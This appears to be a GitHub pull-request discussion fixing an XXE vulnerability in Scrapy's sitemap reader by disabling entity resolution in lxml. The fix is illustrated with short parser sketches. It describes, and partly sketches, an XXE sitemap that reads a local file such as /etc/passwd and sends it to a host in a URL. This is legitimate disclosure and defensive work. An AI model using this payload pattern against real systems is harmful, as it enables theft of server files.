Fixed XXE flaw in sitemap reader #676
oooh, serious bug! Is it the same for scrapy.selector.Selector on XMLResponses?
I wonder if we should use https://pypi.python.org/pypi/defusedxml#defusedxml-lxml
@csalazar are you going to update the PR with fixes for the other Selector? Do you mind adding a test case specifically for the LxmlDocument class? defusedxml looks good, but it may require more work to integrate; on the other hand, resolve_entities=False looks quick enough to be merged soon.
class SafeXMLParser(etree.XMLParser):
    def __init__(self, *args, **kwargs):
        super(SafeXMLParser, self).__init__(*args, resolve_entities=False, **kwargs)
dangra
Apr 4, 2014
Member
I prefer to set resolve_entities using kwargs.setdefault() if this class is meant to be public.
csalazar
Apr 4, 2014
Author
Contributor
Yes, that seems better, I've updated the method.
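For reference, a minimal sketch of the kwargs.setdefault() variant suggested above, assuming lxml is installed. The class name follows the diff; the code actually merged in the PR may differ.

```python
from lxml import etree


class SafeXMLParser(etree.XMLParser):
    """XMLParser that leaves entities unresolved unless the caller opts in."""

    def __init__(self, *args, **kwargs):
        # setdefault keeps an explicit resolve_entities=... passed by the
        # caller, and avoids the "multiple values for keyword argument"
        # TypeError that a hard-coded keyword would raise in that case.
        kwargs.setdefault('resolve_entities', False)
        super(SafeXMLParser, self).__init__(*args, **kwargs)


# Illustrative document with an internal custom entity (not from the PR).
DOC = b'<!DOCTYPE a [<!ENTITY e "secret">]><a>&e;</a>'

safe_root = etree.fromstring(DOC, SafeXMLParser())
opt_in_root = etree.fromstring(DOC, SafeXMLParser(resolve_entities=True))
```

With the default, the `&e;` reference is kept as an unexpanded entity node; passing resolve_entities=True explicitly restores expansion for callers who need it.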
LGTM, it deserves a hotfix release.
Is it expanding entities like
No, no entities are expanded.
I wonder if we can expand standard entities but disallow custom entities. This change fixes the security issue, so it is good to merge, but it is backwards incompatible for XML selectors.
Hi @kmike, I think that a valid XML file shows the raw version of standard entities and not their HTML encoding. If you have an example, please paste it, since we have to check whether it breaks the XML document too.
I was asking about predefined XML entities like
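A quick way to check the predefined-entity question, sketched under the assumption that lxml is installed. To my understanding, the XML predefined entities (such as `&amp;` and `&lt;`) are decoded by the underlying parser regardless of resolve_entities, while entities declared in a DTD are left as unexpanded references. The sample documents are illustrative, not taken from the PR.

```python
from lxml import etree

parser = etree.XMLParser(resolve_entities=False)

# Predefined entities: decoded by the parser itself.
root = etree.fromstring(b'<loc>a &amp; b &lt; c</loc>', parser)
predefined_text = root.text

# Custom entity declared in the internal DTD subset: kept as a reference.
doc = b'<!DOCTYPE loc [<!ENTITY custom "expanded">]><loc>&custom;</loc>'
custom_serialized = etree.tostring(etree.fromstring(doc, parser))
```

If this holds on the lxml version in use, the backwards-incompatible part of the change would be limited to documents that rely on DTD-declared entities.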
The XML reader, used by SitemapSpider to process XML sitemaps, is vulnerable to an XML External Entity (XXE) attack. The code to reproduce the bug is displayed below.
test.py
malicious_sitemap.xml
As a result, the contents of /etc/passwd are sent to the server http://127.0.0.1:8000/ as part of the URL path.
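The shape of the attack and of the mitigation can be sketched as follows, assuming lxml is installed. This is not the original test.py or malicious_sitemap.xml: the sitemap is a simplified, hypothetical payload without the sitemap namespace, and a temporary file stands in for /etc/passwd so the sketch is harmless to run.

```python
import os
import tempfile
from pathlib import Path

from lxml import etree

# Stand-in for a sensitive local file such as /etc/passwd.
fd, secret_path = tempfile.mkstemp()
with os.fdopen(fd, "w") as f:
    f.write("TOP-SECRET")

# Hypothetical malicious sitemap: an external entity points at the local
# file and is referenced inside a <loc> URL the spider would request.
sitemap = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE urlset [<!ENTITY xxe SYSTEM "{uri}">]>'
    '<urlset><url><loc>http://127.0.0.1:8000/&xxe;</loc></url></urlset>'
).format(uri=Path(secret_path).as_uri())

# With resolve_entities=False the reference is never replaced by the
# file contents, so nothing sensitive ends up in the URL.
parser = etree.XMLParser(resolve_entities=False)
root = etree.fromstring(sitemap.encode("utf-8"), parser)
serialized = etree.tostring(root)

os.remove(secret_path)
```

The serialized tree still contains the literal `&xxe;` reference instead of the file contents, which is the behaviour the fix relies on.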